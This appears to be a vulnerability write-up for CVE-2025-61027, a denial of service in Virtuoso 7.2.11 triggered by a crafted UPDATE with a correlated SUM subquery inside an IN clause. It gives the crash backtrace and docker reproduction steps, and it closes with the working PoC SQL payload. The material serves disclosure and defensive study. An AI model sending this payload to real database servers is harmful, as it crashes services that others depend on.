CVE-2025-61027

An attacker can cause a denial of service by sending a specially crafted SQL `UPDATE` statement that includes a correlated subquery with an aggregate function (`SUM`) inside an `IN` clause. The statement does not require authentication beyond a valid database connection. The PoC provided in [ref_id=1] demonstrates the exact payload that triggers a crash in `t_set_push` during query compilation.

The crash occurs in `t_set_push` (frame #0) during query compilation, triggered by a crafted `UPDATE` statement with a correlated subquery that uses `SUM` inside an `IN` clause. The backtrace shows the fault propagates through `sqlo_fun_ref_epilogue`, `sqlo_layout_1`, `sqlo_layout`, and ultimately `sqlc_update_searched`, confirming the vulnerability lies in the SQL query compiler's handling of aggregate expressions in subqueries.

The advisory [ref_id=1] does not include a patch or fix. The vendor has not yet published a remediation. Based on the crash location in `t_set_push`, a fix would likely need to add a null-pointer or bounds check when the query compiler processes aggregate expressions inside subqueries used in `IN` clauses, preventing the segmentation fault.

1. Start a Virtuoso 7.2.11 container: `docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7` 2. Wait 10 seconds for the server to start. 3. Write the PoC to `/tmp/test.sql`: ``` CREATE TABLE v0 ( v1 DATE NULL ) ; UPDATE v0 SET v1 = v1 + 2 WHERE v1 IN ( SELECT v1 , SUM ( v1 ) AS zero_value FROM v0 AS negative_value CROSS JOIN v0 ON ( '$.datetime(HH24:MI:SS).type()' ) ) ; ``` 4. Execute: `cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba`